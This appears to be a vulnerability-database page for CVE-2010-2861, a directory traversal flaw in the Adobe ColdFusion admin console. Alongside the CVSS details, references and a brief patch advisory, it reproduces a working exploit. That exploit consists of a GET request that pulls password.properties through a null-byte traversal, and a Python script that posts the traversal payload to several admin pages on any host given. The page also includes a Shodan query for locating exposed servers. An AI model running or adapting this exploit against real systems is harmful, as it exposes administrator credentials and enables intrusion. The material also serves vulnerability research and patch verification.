header-logo
Suggest Exploit
vendor:
ColdFusion
by:
leo
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: ColdFusion
Affected Version From: Adobe ColdFusion 8.0 and earlier versions
Affected Version To: Adobe ColdFusion 8.0 and earlier versions
Patch Exists: YES
Related CWE: CVE-2010-2861
CPE: a:adobe:coldfusion:8.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/adobe-apsb10-18-CVE-2010-2861/
Other Scripts: N/A
Tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
CVSS Metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
Nuclei References: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861http://www.adobe.com/support/security/bulletins/apsb10-18.htmlhttp://securityreason.com/securityalert/8148http://securityreason.com/securityalert/8137http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.component:"Adobe ColdFusion"', 'vendor': 'adobe', 'product': 'coldfusion'}
Platforms Tested: None
2010

CVE-2010-2861 – Adobe ColdFusion Unspecified Directory Traversal Vulnerability

Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.

Mitigation:

Adobe has released a security bulletin and patch to address this issue. Users are advised to apply the patch as soon as possible.
Source

Exploit-DB raw data:

# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"


#!/usr/bin/python

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

# leo 13.08.2010

import sys
import socket
import re

# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")

post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

locale=%%00%s%%00a"""

def main():
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return
    
    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]

    for f in filenames:
        print "------------------------------"
        print "trying", f

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.send(post % (f, host, len(path) + 14, path))

        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s
       
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print m.groups(0)[0]
            print "------------------------------"

if __name__ == '__main__':
    main()

Navigation

Suggest Exploit

Services By CQR